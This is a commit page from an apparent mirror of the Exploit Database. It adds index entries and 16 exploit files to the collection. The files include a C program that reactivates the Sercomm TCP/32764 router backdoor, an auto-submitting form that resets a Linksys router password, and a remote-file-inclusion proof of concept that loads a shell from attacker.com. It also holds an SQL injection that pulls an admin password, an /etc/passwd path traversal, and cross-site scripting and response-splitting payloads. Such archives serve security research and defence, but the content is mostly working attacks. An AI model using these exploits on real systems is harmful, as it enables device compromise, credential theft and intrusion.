bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 04_20_2014

Browse source
This commit is contained in:
Offensive Security 2014-04-20 04:34:26 +00:00
parent 7abb0c1c05
commit 0181f4682f
17 changed files with 428 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

16
files.csv
View file

@ -29675,3 +29675,19 @@ id,file,description,date,author,platform,type,port
32924,platforms/php/webapps/32924.txt,"razorCMS 0.3RC2 Multiple Vulnerabilities",2009-04-16,"Jeremi Gosney",php,webapps,0
32925,platforms/multiple/remote/32925.txt,"NRPE <= 2.15 - Remote Command Execution",2014-04-18,"Dawid Golunski",multiple,remote,0
32926,platforms/linux/dos/32926.c,"Linux group_info refcounter - Overflow Memory Corruption",2014-04-18,"Thomas Pollet",linux,dos,0
32927,platforms/java/webapps/32927.txt,"BlackBerry Enterprise Server 4.0/4.1 MDS Connection Service Cross Site Scripting Vulnerability",2009-04-16,"Ken Millar",java,webapps,0
32928,platforms/php/webapps/32928.txt,"Malleo 1.2.3 'admin.php' Local File Include Vulnerability",2009-04-17,Drosophila,php,webapps,0
32929,platforms/linux/remote/32929.txt,"Red Hat Stronghold Web Server 2.3 Cross Site Scripting Vulnerability",2009-04-20,"Xia Shing Zee",linux,remote,0
32930,platforms/php/webapps/32930.txt,"CMSimple 4.4, 4.4.2 - Remote File Inclusion",2014-04-18,NoGe,php,webapps,80
32931,platforms/hardware/remote/32931.html,"Linksys WRT54GC 1.5.7 (Firmware) 'administration.cgi' Access Validation Vulnerability",2009-04-20,"Gabriel Lima",hardware,remote,0
32932,platforms/php/webapps/32932.txt,"Online Photo Pro 2.0 'section' Parameter Cross Site Scripting Vulnerability",2009-04-20,Vrs-hCk,php,webapps,0
32933,platforms/php/webapps/32933.txt,"Online Contact Manager 3.0 index.php showGroup Parameter XSS",2009-04-20,Vrs-hCk,php,webapps,0
32934,platforms/php/webapps/32934.txt,"Online Contact Manager 3.0 view.php id Parameter XSS",2009-04-20,Vrs-hCk,php,webapps,0
32935,platforms/php/webapps/32935.txt,"Online Contact Manager 3.0 email.php id Parameter XSS",2009-04-20,Vrs-hCk,php,webapps,0
32936,platforms/php/webapps/32936.txt,"Online Contact Manager 3.0 edit.php id Parameter XSS",2009-04-20,Vrs-hCk,php,webapps,0
32937,platforms/php/webapps/32937.txt,"Online Contact Manager 3.0 delete.php id Parameter XSS",2009-04-20,Vrs-hCk,php,webapps,0
32938,platforms/hardware/remote/32938.c,"Sercomm TCP/32674 Backdoor Reactivation",2014-04-18,Synacktiv,hardware,remote,32674
32939,platforms/windows/dos/32939.txt,"Trend Micro OfficeScan 8.0 Client - Denial of Service Vulnerability",2009-04-21,"Juan Pablo Lopez Yacubian",windows,dos,0
32940,platforms/java/webapps/32940.txt,"Sun Java System Delegated Administrator 6.x HTTP Response Splitting Vulnerability",2009-04-21,"SCS team",java,webapps,0
32941,platforms/php/webapps/32941.txt,"PTCeffect 4.6 - LFI & SQL Injection Vulnerabilities",2014-04-19,"walid naceri",php,webapps,0
32942,platforms/linux/remote/32942.txt,"Mozilla Multiple Products Server Refresh Header XSS",2009-04-22,"Olli Pettay",linux,remote,0

Can't render this file because it is too large.

9
platforms/hardware/remote/32931.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34616/info
The Linksys WRT54GC router is prone to an access-validation vulnerability because of a lack of authentication when users access specific administration applications.
Successful attacks will lead to a compromise of the vulnerable device, which may lead to further attacks.
Linksys WRT54GC running firmware 1.05.7 is vulnerable; other versions may also be affected.
<html><body> <form method="POST" action="http://IP_ADDRESS:8080/administration.cgi" name="senha" ENCTYPE="multipart/form-data"> <INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21> <INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21> </form> <!-- C?digo de envio autom?tico do formul?rio --> <SCRIPT language="JavaScript"> document.senha.submit(); </SCRIPT>

164
platforms/hardware/remote/32938.c Executable file
View file

@ -0,0 +1,164 @@
/***************************************
* PoC to reactivate Sercomm TCP/32674 backdoor
* See http://www.synacktiv.com/ressources/TCP32764_backdoor_again.pdf
* Eloi Vanderbeken - Synacktiv
*
* THIS SOFTWARE IS PROVIDED BY SYNACKTIV ''AS IS'' AND ANY
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL SYNACKTIV BE LIABLE FOR ANY
* DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
* PoC based on Wilmer van der Gaast's code
* http://wiki.openwrt.org/_media/toh/netgear/dg834.g.v4/nftp.c
***************************************/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <linux/if_ether.h>
#include <linux/if_packet.h>
#include <linux/if_arp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#define ETH_P_NFTP 0x8888
enum backdoor_command {
PING_BACKDOOR = 0x200,
SCFGMGR_LAUNCH,
SET_IP
};
struct ether_header
{
unsigned char ether_dhost[ETH_ALEN];
unsigned char ether_shost[ETH_ALEN];
unsigned short ether_type;
} eth;
struct raw_packet {
struct ether_header header;
uint16_t type;
uint16_t sequence;
uint16_t offset;
uint16_t chunk;
uint16_t payload_len;
uint8_t payload[528];
};
int main(int argc, char *argv[])
{
int sockfd, res, i, len;
char src_mac[ETH_ALEN];
struct ifreq iface;
struct sockaddr_ll socket_address;
struct raw_packet packet;
memset(&packet, 0, sizeof(packet));
if (argc < 2)
{
fprintf(stderr, "usage : %s [IFNAME]\n", argv[0]);
exit(1);
}
sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (sockfd == -1)
{
if(geteuid() != 0)
{
fprintf(stderr, "You should probably run this program as root.\n");
}
perror("socket");
exit(1);
}
seteuid(getuid());
strncpy(iface.ifr_name, argv[1], IFNAMSIZ);
res = ioctl(sockfd, SIOCGIFHWADDR, &iface);
if(res < 0)
{
perror("ioctl");
exit(1);
}
memcpy(src_mac, iface.ifr_hwaddr.sa_data, ETH_ALEN);
res = ioctl(sockfd, SIOCGIFINDEX, &iface);
if(res < 0)
{
perror("ioctl");
exit(1);
}
// set src mac
memcpy(packet.header.ether_shost, src_mac, ETH_ALEN);
// broadcast
memset(packet.header.ether_dhost, 0xFF, ETH_ALEN);
// MD5("DGN1000")
memcpy(packet.payload, "\x45\xD1\xBB\x33\x9B\x07\xA6\x61\x8B\x21\x14\xDB\xC0\xD7\x78\x3E", 0x10);
packet.payload_len = htole16(0x10);
// ethernet packet type = 0x8888
packet.header.ether_type = htons(ETH_P_NFTP);
// launch TCP/32764 backdoor
packet.type = htole16(SCFGMGR_LAUNCH);
socket_address.sll_family = PF_PACKET;
socket_address.sll_protocol = htons(ETH_P_NFTP);
socket_address.sll_ifindex = iface.ifr_ifindex;
socket_address.sll_hatype = ARPHRD_ETHER;
socket_address.sll_pkttype = PACKET_OTHERHOST;
// broadcast
socket_address.sll_halen = ETH_ALEN;
memset(socket_address.sll_addr, 0xFF, ETH_ALEN);
res = sendto(sockfd, &packet, 0x10 + 24, 0, (struct sockaddr *)&socket_address, sizeof(socket_address));
if (res == -1)
{
perror("sendto");
exit(1);
}
do {
memset(&packet, 0, sizeof(packet));
res = recvfrom(sockfd, &packet, sizeof(packet), 0, NULL, NULL);
if (res == -1)
{
perror("recvfrom");
exit(1);
}
} while (ntohs(packet.header.ether_type) != ETH_P_NFTP);
if (res < sizeof(packet) - sizeof(packet.payload))
{
fprintf(stderr, "packet is too short: %d bytes\n", res);
exit(1);
}
len = be16toh(packet.payload_len); // SerComm has a real problem with endianness
printf("received packet: %d bytes (payload len = %d) from ", res, len);
for (i = 0; i < ETH_ALEN; i++)
printf("%02X%c", packet.header.ether_shost[i], i == ETH_ALEN-1 ? '\n' : ':');
for (i = 0; (i < len) && (i < sizeof(packet.payload)); i++)
{
printf("%02X ", packet.payload[i]);
if ((i+1) % 16 == 0)
printf("\n");
}
printf("\n");
return 0;
}

29
platforms/java/webapps/32927.txt Executable file
View file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/34573/info
BlackBerry Enterprise Server MDS Connection Service is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
Versions prior to BlackBerry Enterprise Server 4.1.6 MR5 are vulnerable.
POST /admin/statistics/ConfigureStatistics HTTP/1.0
Cookie: JSESSIONID=....
Content-Length: 753
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: ...
Content-Type: application/x-www-form-urlencoded
Referer: http://www.example.com:8080/admin/statistics/ConfigureStatistics
customDate=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
interval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
lastCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E
&lastIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%
3E&nextCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript
%3E&nextIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%
2Fscript%3E&action=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E
&delIntervalIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
addStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
delStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
referenceTime=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E

23
platforms/java/webapps/32940.txt Executable file
View file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/34643/info
Sun Java System Delegated Administrator is prone to an HTTP response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data.
Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.
The following example HTTP session is available:
$ openssl s_client -connect <server>:443
GET
/da/DA/Login?Login.HelpHREF=http://www.example.com/&com_sun_web_ui_popup=false&HELP_PAGE=/help/%0AX-Tag:%20Core%20Security%20Technologies%0A%0D&jato.pageSession=
HTTP/1.1
Host: <server>
HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 20 Apr 2009 18:21:48 GMT
Cache-control: private
Location: <server>
X-Tag: Core Security Technologies
Content-length: 0
Content-type: text/htm

9
platforms/linux/remote/32929.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34606/info
Red Hat Stronghold Web Server is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
Stronghold 2.3 is vulnerable; other versions may also be affected.
http://www.example.com/<script>alert("lol");</script> http://www.example.com/<script>window.location="http://www.google.com"</script> http://www.example.com/<body bgcolor="black"><font color="green">

13
platforms/linux/remote/32942.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/34656/info
The Mozilla Foundation has released multiple security advisories specifying various vulnerabilities in Firefox, Thunderbird, and SeaMonkey.
Attackers can exploit these issues to bypass same-origin restrictions, obtain potentially sensitive information, and execute arbitrary script code with elevated privileges; other attacks are also possible.
With request to script at web site:
http://www.example.com/script.php?param=javascript:alert(document.cookie)
Which returns in answer the refresh header:
refresh: 0; URL=javascript:alert(document.cookie)

9
platforms/php/webapps/32928.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34588/info
Malleo is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view and execute arbitrary local files in the context of the webserver process. This may aid in further attacks.
Malleo 1.2.3 is vulnerable; other versions may also be affected.
http://www.example.com/path/admin.php?module=../../../../../etc/passwd

56
platforms/php/webapps/32930.txt Executable file
View file

@ -0,0 +1,56 @@
=============================================================================================================
[o] CMSimple - Open Source CMS with no database <= Remote File Inclusion Vulnerability
Software : CMSimple - Open Source CMS with no database
Version : 4.4, 4.4.2 and below
Vendor : http://www.cmsimple.org
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com
Desc : CMSimple is a php based Content Managemant System (CMS), which requires no database.
All data are stored in a simple file system.
=============================================================================================================
[o] Vulnerable File
plugins/filebrowser/classes/required_classes.php
require_once $pth['folder']['plugin'] . 'classes/filebrowser_view.php';
require_once $pth['folder']['plugin'] . 'classes/filebrowser.php';
=============================================================================================================
[o] Exploit
http://localhost/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=[RFI]
=============================================================================================================
[o] PoC
http://target.com/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt?
=============================================================================================================
[o] Greetz
Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe kaka11 matthews wishnusakti inc0mp13te martfella
pizzyroot Genex H312Y noname tukulesto }^-^{
=============================================================================================================
[o] April 17 2014 - Papua, Indonesia - Met Paskah! Tuhan berkati.. :)

9
platforms/php/webapps/32932.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34625/info
Online Photo Pro is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
Online Photo Pro 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?section=<script>alert(123)</script>

9
platforms/php/webapps/32933.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34626/info
Online Contact Manager is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Online Contact Manager 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?showGroup=+<script>alert(123)</script>

9
platforms/php/webapps/32934.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34626/info
Online Contact Manager is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Online Contact Manager 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/view.php?id=+<script>alert(123)</script>

9
platforms/php/webapps/32935.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34626/info
Online Contact Manager is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Online Contact Manager 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/email.php?id=+<script>alert(123)</script>

9
platforms/php/webapps/32936.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34626/info
Online Contact Manager is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Online Contact Manager 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/edit.php?id=+<script>alert(123)</script>

9
platforms/php/webapps/32937.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34626/info
Online Contact Manager is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Online Contact Manager 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/delete.php?id=+<script>alert(123)</script>

37
platforms/php/webapps/32941.txt Executable file
View file

@ -0,0 +1,37 @@
# Exploit Title: PTCeffect LFI & SQL Injection Vulnerabilities
# Google Dork: find it :)
# Date: 2014-04-19
# Exploit Author: Walidz
# Software Link: http://www.ptceffect.com/
# Version: 4.6
# Tested on: windows,linux,mac os
# CVE : N/A
The LFI vulnerability is in index.php
--------------------[index.php]--------------------
if ($input->g['view']) {
$filename = strtolower($input->g['view']) . ".php";
[...]
include SOURCES . $filename;
--------------------[index.php]--------------------
So you can include a fil by doing ; http://[site]/index.php?view=[file]
By using the LFI, you can also include "admin files" which are especially unsecure, and let you inject SQL queries.
As the file admin/sources/edit_loginad.php
PoC ; http://[site]/index.php?view=../admin/Sources/edit_loginad&edit=-1%20union%20select%201,2,3,4,%28SELECT%20password%20FROM%20admin%29,6,7,8,9--%20-
For more tools and priv8 exploit: http://security-dz.com
For contact: admin@security-dz.com

9
platforms/windows/dos/32939.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34642/info
The Trend Micro OfficeScan Client is prone to a denial-of-service vulnerability because it fails to handle nested directories with excessively long names.
Successfully exploits will crash the affected application, resulting in a denial-of-service condition. Given the nature of this issue, code execution may be possible, but has not been confirmed.
OfficeScan 8.0 SP1 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/32939.zip